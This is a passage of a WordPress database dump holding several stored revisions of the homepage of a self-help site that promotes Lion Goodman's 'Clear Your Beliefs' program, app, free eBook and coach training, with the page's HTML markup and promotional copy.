style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 17:51:55', '2014-11-06 22:51:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1659, 2, '2014-11-06 17:53:13', '2014-11-06 22:53:13', '', 'iCreate new copy', '', 'inherit', 'closed', 'open', '', 'icreate-new-copy', '', '', '2014-11-06 17:53:13', '2014-11-06 22:53:13', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg', 0, 'attachment', 'image/jpeg', 0),
(1661, 2, '2014-11-06 18:02:42', '2014-11-06 23:02:42', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 64px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center;margin-top: 15px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center;margin-top: 15px">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:02:42', '2014-11-06 23:02:42', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1660, 2, '2014-11-06 17:55:45', '2014-11-06 22:55:45', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 17:55:45', '2014-11-06 22:55:45', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1662, 2, '2014-11-06 18:04:30', '2014-11-06 23:04:30', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 54px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:04:30', '2014-11-06 23:04:30', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1664, 2, '2014-11-06 18:08:03', '2014-11-06 23:08:03', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 54px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:08:03', '2014-11-06 23:08:03', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1663, 2, '2014-11-06 18:06:47', '2014-11-06 23:06:47', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 54px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 10px">     </p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-06 18:06:47', '2014-11-06 23:06:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1665, 2, '2014-11-06 18:10:50', '2014-11-06 23:10:50', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 64px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h1>The <em>Clear Your Beliefs</em> Program empowers you to...</h1>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</strong><strong>Creator of the <em>Clear Your Beliefs</em> program. </strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p> <em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply 